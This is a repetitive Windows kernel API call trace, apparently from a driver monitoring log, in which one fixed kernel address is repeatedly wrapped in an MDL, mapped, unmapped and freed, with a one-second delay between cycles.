| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000487ed580, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a8b2a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a8b2a40, MemoryDescriptorList_unk = 0xffffe000487ed580 |
| IoFreeMdl | Mdl_unk = 0xffffe000487ed580 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000487ed580 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000487ed580, MemoryDescriptorList_unk_out = 0xffffe000487ed580 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000487ed580, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002a8cfa40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002a8cfa40, MemoryDescriptorList_unk = 0xffffe000487ed580 |
| IoFreeMdl | Mdl_unk = 0xffffe000487ed580 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000487ed580 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000487ed580, MemoryDescriptorList_unk_out = 0xffffe000487ed580 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000487ed580, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002ab0da40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002ab0da40, MemoryDescriptorList_unk = 0xffffe000487ed580 |
| IoFreeMdl | Mdl_unk = 0xffffe000487ed580 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000487ed580 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000487ed580, MemoryDescriptorList_unk_out = 0xffffe000487ed580 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000487ed580, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002ab11a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002ab11a40, MemoryDescriptorList_unk = 0xffffe000487ed580 |
| IoFreeMdl | Mdl_unk = 0xffffe000487ed580 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000487ed580 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000487ed580, MemoryDescriptorList_unk_out = 0xffffe000487ed580 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000487ed580, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002ab13a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002ab13a40, MemoryDescriptorList_unk = 0xffffe000487ed580 |
| IoFreeMdl | Mdl_unk = 0xffffe000487ed580 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003be355f0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003be355f0, MemoryDescriptorList_unk_out = 0xffffe0003be355f0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003be355f0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002ab15a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002ab15a40, MemoryDescriptorList_unk = 0xffffe0003be355f0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003be355f0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003be355f0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003be355f0, MemoryDescriptorList_unk_out = 0xffffe0003be355f0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003be355f0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002ab4da40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002ab4da40, MemoryDescriptorList_unk = 0xffffe0003be355f0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003be355f0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003be355f0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003be355f0, MemoryDescriptorList_unk_out = 0xffffe0003be355f0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003be355f0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002add0a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002add0a40, MemoryDescriptorList_unk = 0xffffe0003be355f0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003be355f0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003be355f0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003be355f0, MemoryDescriptorList_unk_out = 0xffffe0003be355f0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003be355f0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002ae3da40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002ae3da40, MemoryDescriptorList_unk = 0xffffe0003be355f0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003be355f0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003be355f0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003be355f0, MemoryDescriptorList_unk_out = 0xffffe0003be355f0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003be355f0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002ae6ca40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002ae6ca40, MemoryDescriptorList_unk = 0xffffe0003be355f0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003be355f0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003a4ae280 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003a4ae280, MemoryDescriptorList_unk_out = 0xffffe0003a4ae280 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003a4ae280, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002af4ea40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002af4ea40, MemoryDescriptorList_unk = 0xffffe0003a4ae280 |
| IoFreeMdl | Mdl_unk = 0xffffe0003a4ae280 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003a4ae280 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003a4ae280, MemoryDescriptorList_unk_out = 0xffffe0003a4ae280 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003a4ae280, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002af54a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002af54a40, MemoryDescriptorList_unk = 0xffffe0003a4ae280 |
| IoFreeMdl | Mdl_unk = 0xffffe0003a4ae280 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe000487ed580 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe000487ed580, MemoryDescriptorList_unk_out = 0xffffe000487ed580 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe000487ed580, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002af63a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002af63a40, MemoryDescriptorList_unk = 0xffffe000487ed580 |
| IoFreeMdl | Mdl_unk = 0xffffe000487ed580 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003a4ae280 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003a4ae280, MemoryDescriptorList_unk_out = 0xffffe0003a4ae280 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003a4ae280, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002b0e2a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b0e2a40, MemoryDescriptorList_unk = 0xffffe0003a4ae280 |
| IoFreeMdl | Mdl_unk = 0xffffe0003a4ae280 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003a4ae280 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003a4ae280, MemoryDescriptorList_unk_out = 0xffffe0003a4ae280 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003a4ae280, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002b0eba40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b0eba40, MemoryDescriptorList_unk = 0xffffe0003a4ae280 |
| IoFreeMdl | Mdl_unk = 0xffffe0003a4ae280 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003bd5e400 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003bd5e400, MemoryDescriptorList_unk_out = 0xffffe0003bd5e400 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bd5e400, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002b1d7a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b1d7a40, MemoryDescriptorList_unk = 0xffffe0003bd5e400 |
| IoFreeMdl | Mdl_unk = 0xffffe0003bd5e400 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003bd5e400 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003bd5e400, MemoryDescriptorList_unk_out = 0xffffe0003bd5e400 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bd5e400, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002b1d9a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b1d9a40, MemoryDescriptorList_unk = 0xffffe0003bd5e400 |
| IoFreeMdl | Mdl_unk = 0xffffe0003bd5e400 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003bd5e400 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003bd5e400, MemoryDescriptorList_unk_out = 0xffffe0003bd5e400 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bd5e400, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002b1dea40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b1dea40, MemoryDescriptorList_unk = 0xffffe0003bd5e400 |
| IoFreeMdl | Mdl_unk = 0xffffe0003bd5e400 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003bd5e400 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003bd5e400, MemoryDescriptorList_unk_out = 0xffffe0003bd5e400 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bd5e400, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002b1eea40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b1eea40, MemoryDescriptorList_unk = 0xffffe0003bd5e400 |
| IoFreeMdl | Mdl_unk = 0xffffe0003bd5e400 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003bd5e400 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003bd5e400, MemoryDescriptorList_unk_out = 0xffffe0003bd5e400 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bd5e400, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002b5aea40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b5aea40, MemoryDescriptorList_unk = 0xffffe0003bd5e400 |
| IoFreeMdl | Mdl_unk = 0xffffe0003bd5e400 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003bd5e400 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003bd5e400, MemoryDescriptorList_unk_out = 0xffffe0003bd5e400 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bd5e400, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002b5bda40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b5bda40, MemoryDescriptorList_unk = 0xffffe0003bd5e400 |
| IoFreeMdl | Mdl_unk = 0xffffe0003bd5e400 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003bd5e400 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003bd5e400, MemoryDescriptorList_unk_out = 0xffffe0003bd5e400 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003bd5e400, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002b5c0a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b5c0a40, MemoryDescriptorList_unk = 0xffffe0003bd5e400 |
| IoFreeMdl | Mdl_unk = 0xffffe0003bd5e400 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1a2170 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1a2170, MemoryDescriptorList_unk_out = 0xffffe0003c1a2170 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c1a2170, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002b699a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b699a40, MemoryDescriptorList_unk = 0xffffe0003c1a2170 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1a2170 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1a2170 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1a2170, MemoryDescriptorList_unk_out = 0xffffe0003c1a2170 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c1a2170, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002b6a6a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b6a6a40, MemoryDescriptorList_unk = 0xffffe0003c1a2170 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1a2170 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1a2170 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1a2170, MemoryDescriptorList_unk_out = 0xffffe0003c1a2170 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c1a2170, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002b8a5a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b8a5a40, MemoryDescriptorList_unk = 0xffffe0003c1a2170 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1a2170 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1a2170 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1a2170, MemoryDescriptorList_unk_out = 0xffffe0003c1a2170 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c1a2170, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002b8aea40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b8aea40, MemoryDescriptorList_unk = 0xffffe0003c1a2170 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1a2170 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1a2170 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1a2170, MemoryDescriptorList_unk_out = 0xffffe0003c1a2170 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c1a2170, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002b8afa40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b8afa40, MemoryDescriptorList_unk = 0xffffe0003c1a2170 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1a2170 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c1fc4c0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c1fc4c0, MemoryDescriptorList_unk_out = 0xffffe0003c1fc4c0 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c1fc4c0, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002b8d5a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002b8d5a40, MemoryDescriptorList_unk = 0xffffe0003c1fc4c0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c1fc4c0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
| IoAllocateMdl | VirtualAddress_ptr = 0xfffff800fc2caa40, Length = 0x8, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003c270490 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003c270490, MemoryDescriptorList_unk_out = 0xffffe0003c270490 |
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c270490, AccessMode_unk = 0x0, CacheType_unk = 0x0, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002ba34a40 |
| MmUnmapLockedPages | BaseAddress_ptr = 0xffffd0002ba34a40, MemoryDescriptorList_unk = 0xffffe0003c270490 |
| IoFreeMdl | Mdl_unk = 0xffffe0003c270490 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002a40f4d8, Interval = -10000000, ret_val_out = 0x0 |
